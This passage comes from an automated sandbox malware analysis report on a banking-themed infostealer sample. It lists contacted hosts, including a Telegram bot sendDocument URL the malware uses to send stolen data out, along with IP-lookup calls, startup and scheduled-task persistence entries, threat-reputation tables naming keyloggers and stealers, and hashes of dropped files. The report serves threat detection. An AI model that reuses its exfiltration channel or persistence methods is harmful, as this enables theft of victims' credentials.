http://r11.i.lencr.org/0	neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002732000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732533373.0000000005D44000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732308014.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.mi	powershell.exe, 0000000F.00000002.1374308109.000000000720C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org	svchost.exe, 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmp	false		high
http://54.244.188.177/vnpplpufavm	svchost.exe, 00000022.00000003.1482948016.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.1575610744.0000000003280000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.comd	server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 0000000F.00000002.1366121980.00000000047B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CFE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CFE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.228l	server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, server02.exe.5.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmp	false		high
http://s82.gocheapweb.com	neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002986000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	server02.exe, 0000000C.00000002.3712810154.000000000290B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgd	server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/d	server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	server02.exe, 0000000C.00000002.3712810154.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1366121980.00000000047B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://54.244.188.177/	svchost.exe, svchost.exe, 00000022.00000003.1573768980.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.1575866275.00000000032BB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot-/sendDocument?chat_id=	svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, server02.exe.5.dr	false		high
https://reallyfreegeoip.org/xml/	svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, server02.exe.5.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
54.244.188.177	cvgrf.biz	United States	16509	AMAZON-02US	false
51.195.88.199	s82.gocheapweb.com	France	16276	OVHFR	false
18.141.10.107	ssbzmoy.biz	United States	16509	AMAZON-02US	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1564711
Start date and time:	2024-11-28 18:25:50 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@48/28@10/6
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 85% Number of executed functions: 90 Number of non-executed functions: 295
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target TrojanAI.exe, PID 6340 because it is empty
Execution Graph export aborted for target TrojanAI.exe, PID 7952 because it is empty
Execution Graph export aborted for target TrojanAIbot.exe, PID 7252 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3036 because it is empty
Execution Graph export aborted for target server02.exe, PID 6012 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Simulations

Behavior and APIs

Time	Type	Description
12:26:53	API Interceptor	20x Sleep call for process: powershell.exe modified
12:26:53	API Interceptor	5614300x Sleep call for process: neworigin.exe modified
12:26:55	API Interceptor	2216773x Sleep call for process: TrojanAIbot.exe modified
14:19:15	API Interceptor	3x Sleep call for process: svchost.exe modified
18:26:50	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs
18:26:52	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
18:27:05	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	JIL-_Document_No._2500015903.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	z705688y7t7tgggju97867756576.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Viderefrt.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PACKING_LIST_DOCUMENT_BQG9390309727.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	EPTMAcgvNZ.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	INV-0542.pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
54.244.188.177	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	lrxdmhrr.biz/tgcwttfqletfhyq
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	rynmcq.biz/msoqwwrwyts
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	rynmcq.biz/qqnj
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	pywolwnvd.biz/ksmybghbmbq
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	lrxdmhrr.biz/wt
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	rynmcq.biz/qwi
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	ecxbwt.biz/brgveksk
	Z4KBs1USsJ.exe	Get hash	malicious	Unknown	Browse	gentleanother.net/index.php
	YiqjcLlhew.exe	Get hash	malicious	Unknown	Browse	gentleanother.net/index.php
	Z4KBs1USsJ.exe	Get hash	malicious	Unknown	Browse	gentleanother.net/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cvgrf.biz	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	54.244.188.177
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	54.244.188.177
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	54.244.188.177
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
ssbzmoy.biz	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	18.141.10.107
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	18.141.10.107
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
pywolwnvd.biz	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	54.244.188.177
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	2jbMIxCFsK.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	54.244.188.177
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	54.244.188.177
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	54.244.188.177
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	54.244.188.177

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UTMEMUS	Teklif_PDF.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	132.192.108.101
	ORDER-2411250089.PDF.js	Get hash	malicious	WSHRat, PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	Po-5865A.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	JIL-_Document_No._2500015903.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	z705688y7t7tgggju97867756576.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Viderefrt.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	VSP469620.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
OVHFR	SITHIPHORN_Doc2709202400000.exe	Get hash	malicious	AgentTesla	Browse	188.165.135.205
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	142.44.233.27
	file.exe	Get hash	malicious	Unknown	Browse	54.37.204.238
	file.exe	Get hash	malicious	Unknown	Browse	51.38.126.82
	UltraViewer_setup_6.6_en.zip	Get hash	malicious	Unknown	Browse	51.195.67.236
	https://go-pdf.online/abap-development-for-financial-accounting-custom-enhancements.pdf	Get hash	malicious	Unknown	Browse	46.105.201.240
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	198.27.117.138
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	5.196.105.24
	botx.sh4.elf	Get hash	malicious	Mirai	Browse	51.255.248.67
	nabarm.elf	Get hash	malicious	Unknown	Browse	145.239.10.162
AMAZON-02US	Docs.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	18.139.62.226
	t1gY0BGmOZ.jar	Get hash	malicious	Can Stealer	Browse	45.112.123.126
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.244.18.27
	https://share.fremontpeak.org/___.YzJ1OmNvZ2l3ZWIyOmM6bzpiNTEyZDAxNmZiN2I1MjU1MmE3OTQzOTdiZmE2NWEzZjo3OmQ0ZjU6ZDQ4OTQ1MWM1NjM2NzgxOWI0N2UyODgzNmYwYzIzOTkxYjZmOTA5ZjUyY2M5MTJiN2UzZTBiMmYwOTQ5NzhhNTpoOlQ6Tg	Get hash	malicious	Unknown	Browse	76.76.21.98
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	79.125.17.155
	file.exe	Get hash	malicious	Unknown	Browse	54.67.42.145
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	18.175.16.150
	file.exe	Get hash	malicious	Unknown	Browse	54.67.42.145
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	13.232.161.249
	http://englobe.infralogin.com/passresetconfirm/ODA0MDY/6qb-fdbad004345ade5cc1bb/	Get hash	malicious	Unknown	Browse	13.32.121.32
AMAZON-02US	Docs.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	18.139.62.226
	t1gY0BGmOZ.jar	Get hash	malicious	Can Stealer	Browse	45.112.123.126
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.244.18.27
	https://share.fremontpeak.org/___.YzJ1OmNvZ2l3ZWIyOmM6bzpiNTEyZDAxNmZiN2I1MjU1MmE3OTQzOTdiZmE2NWEzZjo3OmQ0ZjU6ZDQ4OTQ1MWM1NjM2NzgxOWI0N2UyODgzNmYwYzIzOTkxYjZmOTA5ZjUyY2M5MTJiN2UzZTBiMmYwOTQ5NzhhNTpoOlQ6Tg	Get hash	malicious	Unknown	Browse	76.76.21.98
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	79.125.17.155
	file.exe	Get hash	malicious	Unknown	Browse	54.67.42.145
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	18.175.16.150
	file.exe	Get hash	malicious	Unknown	Browse	54.67.42.145
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	13.232.161.249
	http://englobe.infralogin.com/passresetconfirm/ODA0MDY/6qb-fdbad004345ade5cc1bb/	Get hash	malicious	Unknown	Browse	13.32.121.32

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	rSolicita____odecota____o.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	inseminating.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	Teklif Talebi__77252662______PDF_PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	hesaphareketi-01-27112024.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Teklif_PDF.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Siparis po 1198624 _#U0130zmir #U0130stinyepark Projesi.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	tnljashd27.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.67.74.152
	sdfgdsfkjg27.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.67.74.152
	tnkjasdhf27.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.67.74.152
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	#U8b49#U64da_89004161-000002102-66_20241128#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.74.152
	SITHIPHORN_Doc2709202400000.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Document BT24#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.74.152
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.67.74.152
	file.exe	Get hash	malicious	Unknown	Browse	172.67.74.152

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse
	2jbMIxCFsK.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse
	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	server_BTC.exe	Get hash	malicious	Unknown	Browse
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse
	server_BTC.exe	Get hash	malicious	Unknown	Browse
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290240
Entropy (8bit):	5.277761528205587
Encrypted:	false
SSDEEP:	12288:xImGUcsvZZdubv7hfl3kXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:xxGBcmlUsqjnhMgeiCl7G0nehbGZpbD
MD5:	911868154988B08BC9EC4AF4D85832D3
SHA1:	B2E4E0D0F2CC52DA43C3CC4690E3866494BFEE09
SHA-256:	28585E10A6A982963B6F758254A4D6DB632DE3792F34AB627EB9F36731B89432
SHA-512:	1CA33E0641C117844C3070E26B0C6E05CDB0B79049E0E0BB1004E8CEB49B4D4B31FC0916186E152FC582F886BC3109B90F59C0C347F7D8C18ACD1D9391D29B42
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.........................................................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAI.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\TrojanAI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
